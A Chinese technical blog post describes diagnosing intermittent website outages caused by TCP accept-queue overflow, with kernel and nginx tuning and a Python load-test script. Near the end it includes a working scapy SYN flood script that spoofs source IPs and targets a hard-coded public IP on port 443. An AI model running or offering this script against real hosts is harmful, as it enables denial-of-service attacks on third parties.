查看原文
其他

一次惊心动魄的网站 TCP 队列问题排查

信息安全公益宣传,信息安全知识启蒙。

加微信群回复公众号:微信群QQ群16004488

加微信群或QQ群可免费索取:学习教程

教程列表见微信公众号底部菜单


作者 刘晓明

问题描述


1、监控系统发现电商网站主页及其它页面间歇性的无法访问; 


2、查看安全防护和网络流量、应用系统负载均正常; 


3、系统重启后,能够暂时解决,但持续一段时间后间歇性问题再次出现。


此时问题已经影响到整个网站的正常业务,我的那个心惊的呀,最主要报警系统没有任何报警,服务运行一切正常,瞬时背上的汗已经出来了。但还是要静心,来仔细寻找蛛丝马迹,来一步一步找问题。


问题初步判断


1、检查dev 和 网卡设备层,是否有error和drop

cat /proc/net/dev 和 ifconfig,分析在硬件和系统层,未发现异常


2、观察socket overflow 和 socket droped(如果应用处理全连接队列(accept queue)过慢 socket overflow,影响半连接队列(syn queue)溢出socket dropped)

netstat -s |grep -i listen ,发现SYN socket overflow 和 socket droped 急增加。


3、检查sysctl内核参数:backlog,somaxconn,file-max 和 应用程序的backlog

ss -lnt查询,SEND-Q会取上述参数的最小值,发现当时队列已经超过网站80端口和443端口默认值


4、检查 selinux 和NetworkManager 是否启用 ,禁用状态


5、检查timestap ,reuse 启用,内核recycle是否启用,如果过NAT,禁用recycle


6、抓包判断请求进来后应用处理的情况,是否收到SYN未响应情况。

深入分析问题


正常TCP建连接三次握手过程:

  • 第一步:客户端 发送 syn 到 服务端 发起握手;

  • 第二步:服务端 收到 syn后回复syn+ack给 客户端;

  • 第三步: 客户端 收到syn+ack后,回复 服务端 一个ack表示收到了 服务端 的syn+ack 。

从描述的情况来看,TCP建连接的时候全连接队列(accept队列)满了,尤其是描述中症状为了证明是这个原因。反复看了几次之后发现这个overflowed 一直在增加,那么可以明确的是server上全连接队列一定溢出了。

接着查看溢出后,OS怎么处理:

  1. # cat /proc/sys/net/ipv4/tcp_abort_on_overflow

  2. 0

tcpaborton_overflow 为0表示如果三次握手第三步的时候全连接队列满了那么server扔掉client 发过来的ack(在server端认为连接还没建立起来)

为了证明客户端应用代码的异常跟全连接队列满有关系,我先把tcpaborton_overflow修改成 1,1表示第三步的时候如果全连接队列满了,server发送一个reset包给client,表示废掉这个握手过程和这个连接(本来在server端这个连接就还没建立起来)。

接着测试然后在web服务日志中异常中可以看到很多connection reset by peer的错误,到此证明客户端错误是这个原因导致的。

查看sysctl内核参数:backlog ,somaxconn,file-max 和 nginx的backlog配置参数,ss -ln取最小值,发现为128,此时resv-q已经在129 ,请求被丢弃。将上述参数修改,并进行优化:

  • linux内核参进行优化:

  1. net.ipv4.tcp_syncookies = 1

  2. net.ipv4.tcp_max_syn_backlog = 16384

  3. net.core.somaxconn = 16384

  • nginx 配置参数优化: backlog=32768;

利用python 多线程压测,并未发现新的问题:

  1. import requests

  2. from bs4 import BeautifulSoup

  3. from concurrent.futures import ThreadPoolExecutor

  4. url='https://www.wuage.com/'

  5. response=requests.get(url)

  6. soup=BeautifulSoup(response.text,'html.parser')

  7. with ThreadPoolExecutor(20) as ex:

  8.    for each_a_tag in soup.find_all('a'):

  9.        try:

  10.            ex.submit(requests.get,each_a_tag['href'])

  11.        except Exception as err:

  12.            print('return error msg:'+str(err))


理解TCP握手过程中建连接的流程和队列


如上图所示,这里有两个队列:syns queue(半连接队列);accept queue(全连接队列)

三次握手中,在第一步server收到client的syn后,把相关信息放到半连接队列中,同时回复syn+ack给client(第二步);

比如syn floods 攻击就是针对半连接队列的,攻击方不停地建连接,但是建连接的时候只做第一步,第二步中攻击方收到server的syn+ack后故意扔掉什么也不做,导致server上这个队列满其它正常请求无法进来

第三步的时候server收到client的ack,如果这时全连接队列没满,那么从半连接队列拿出相关信息放入到全连接队列中,否则按tcpaborton_overflow指示的执行。

这时如果全连接队列满了并且tcpaborton_overflow是0的话,server过一段时间再次发送syn+ack给client(也就是重新走握手的第二步),如果client超时等待比较短,就很容易异常了。


SYN Flood洪水攻击


当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,导致被攻击服务器保持大量SYN_RECV状态的“半连接”,并且会重试默认5次回应第二个握手包,塞满TCP等待连接队列,资源耗尽(CPU满负荷或内存不足),让正常的业务请求连接不进来。用python实现一个SYN Flood攻击的Demo:

  1. from concurrent.futures import ThreadPoolExecutor

  2. from scapy.all import *

  3. def synFlood(tgt,dPort):

  4.    srcList = ['11.1.1.2','22.1.1.102','33.1.1.2',

  5.               '125.130.5.199']

  6.    for sPort in range(1024, 65535):

  7.        index = random.randrange(4)

  8.        ipLayer = IP(src=srcList[index], dst=tgt)

  9.        tcpLayer = TCP(sport=sPort, dport=dPort,flags='S')

  10.        packet = ipLayer/tcpLayer

  11.        send(packet)

  12. tgt = '139.196.251.198'

  13. print(tgt)

  14. dPort = 443

  15. with ThreadPoolExecutor(10000000) as ex:

  16.    try:

  17.        ex.submit(synFlood(tgt,dPort))

  18.    except Exception as err:

  19.        print('return error msg:' + str(err))

所以大家要对TCP半连接队列和全连接队列的问题很容易被忽视,但是又很关键,特别是对于一些短连接应用更容易爆发、出现问题后,从网络流量、cpu、线程、负载来看都比较正常,在用户端来看rt比较高,但是从服务器端的日志看rt又很短。


静谧岁月弘扬传统文化,传承中华美德,传递正能量。

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存